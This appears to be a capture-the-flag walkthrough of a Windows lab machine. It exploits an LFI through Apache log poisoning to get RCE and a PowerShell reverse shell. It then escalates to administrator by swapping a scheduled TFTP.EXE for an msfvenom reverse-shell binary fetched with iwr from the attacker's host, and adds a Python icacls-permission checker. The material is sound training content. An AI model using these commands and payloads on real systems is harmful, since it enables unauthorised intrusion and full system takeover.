Target IP: 192.168.197.53
For this machine, enumeration is key.
There are plenty of TCP ports open on the target machine, as shown above.
An aggressive nmap scan (nmap -A) gives the result above. The web application on port 8080 looks the most interesting.
Port 8080: HTTP
The webpage above is shown for this application. This is the default webpage of the XAMPP installation.
However, browsing to http://192.168.197.53:8080/site/index.php?page=main.php displays the webpage above. The URL is interesting: the page parameter names a file, and the application loads whatever file is passed as its value. Maybe I can perform LFI/RFI using this parameter?
After some enumeration, I found that the page parameter is vulnerable to LFI. I used ffuf with the command ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u http://192.168.197.53:8080/site/index.php?page=FUZZ -fs 344 | grep "access.log" to find any log files that I could poison, as shown above (-fs 344 hides the 344-byte responses returned for paths that do not load).
I successfully found c:/xampp/apache/logs/access.log is accessible, as shown above; therefore, I can poison it!
I made a request to the web application and intercepted it with Burp Suite. Then I inserted my PHP web shell payload into the User-Agent header and sent the request. Apache writes the User-Agent header to access.log verbatim, so the log file was poisoned, and including it through the LFI gave me RCE. Time to obtain a reverse shell connection!
Since the target is a Windows machine, I used a base64-encoded PowerShell reverse shell script. To keep the payload valid in the URL, I encoded all spaces as %20. Then I executed the reverse shell script through the poisoned log file.
And I got a hit! I successfully got a reverse shell connection on my machine at port 8443 with the session as rupert.
There is a Backup directory. Using icacls, I can see that the current user has full control (F) over this directory.
According to the info.txt file, the binary TFTP.EXE in this directory is executed every five minutes.
Since I have full control over the directory, I can replace this TFTP.EXE binary with a malicious one.
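The icacls check above, as an added Python example that is not part of the original write-up: it parses icacls output and reports which of the current user's identities can write into the directory, so the same check can be run over every candidate directory from a privilege-escalation enumeration instead of reading each listing by eye. The sample listing is constructed for this example (it is not the page's real output), and the identity list stands in for what whoami /groups would report.

```python
import re

# Constructed sample of `icacls C:\Backup` output where a low-privilege user has full
# control (an assumption for this example, not the real listing from the write-up).
SAMPLE_ICACLS = r"""C:\Backup NT AUTHORITY\SYSTEM:(OI)(CI)(F)
          BUILTIN\Administrators:(OI)(CI)(F)
          BUILTIN\Users:(OI)(CI)(RX)
          CREATOR OWNER:(OI)(CI)(IO)(F)
          rupert:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# principal:(flag)(flag)... ; the non-greedy group stops at the colon that is followed
# only by parenthesised groups, so the colon in "C:\" does not confuse it.
ACE_RE = re.compile(r"^(?P<who>.*?):(?P<flags>(?:\([^)]*\))+)\s*$")
# Simple rights that allow writing into a directory; M and F include W.
WRITE_SIMPLE = {"F", "M", "W"}
# Specific rights that let us add or replace files: write data/add file,
# append data/add subdirectory, delete child.
WRITE_SPECIFIC = {"WD", "AD", "DC"}


def parse_icacls(output, path):
    """Return [(principal, set_of_rights_and_flags)] for one icacls listing.

    icacls prints the path before the first ACE and indents the remaining ACEs,
    so the caller passes the path it asked for and it is stripped from line one.
    """
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the trailing "Successfully processed" summary
        # A group such as "(RX,W)" lists several rights inside one pair of parentheses.
        rights = {r for group in re.findall(r"\(([^)]*)\)", m.group("flags"))
                  for r in group.split(",")}
        entries.append((m.group("who"), rights))
    return entries


def writable_by(output, path, identities):
    """Identities (user and group names, case-insensitive) that can write into path.

    Explicit deny ACEs are printed by icacls with a (DENY) flag and are skipped;
    inherit-only ACEs, flagged (IO), apply to children and not to the directory itself,
    so they are skipped as well.
    """
    wanted = {i.lower() for i in identities}
    hits = []
    for who, rights in parse_icacls(output, path):
        if who.lower() not in wanted or "DENY" in rights or "IO" in rights:
            continue
        granted = rights & (WRITE_SIMPLE | WRITE_SPECIFIC)
        if granted:
            hits.append((who, sorted(granted)))
    return hits


if __name__ == "__main__":
    # Identities a `whoami /groups` for rupert might list (constructed).
    me = ["rupert", r"BUILTIN\Users", "CREATOR OWNER", "Everyone"]
    for who, rights in writable_by(SAMPLE_ICACLS, r"C:\Backup", me):
        print(f"{who} can write to C:\\Backup via {','.join(rights)}")
```

On the target, pipe the real listing in with icacls C:\Backup and feed it to writable_by together with the names from whoami /groups; BUILTIN\Users with (RX) and CREATOR OWNER with (IO) are correctly ignored, and only an identity with F, M, W or a write-class specific right is reported.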
Using the command msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=8443 -f exe -o TFTP.EXE --platform windows, I generated a malicious reverse shell executable file that connects to my machine on port 8443.
On the target machine, I used the command iwr -Uri http://192.168.45.228/TFTP.EXE -Outfile TFTP.EXE to download this malicious file. I made sure to rename the original TFTP.EXE to TFTP.EXE.bak first, just in case something went wrong.
After waiting some time for the next scheduled run, I got a reverse shell connection on my machine at port 8443. Now I have a shell session as the user administrator. GG.
The local.txt flag is shown above. It is located on the Desktop of user rupert.
The proof.txt flag, shown above, was obtained after replacing TFTP.EXE with my reverse shell executable to gain a shell session as the user administrator. This flag is located on the Desktop of user administrator.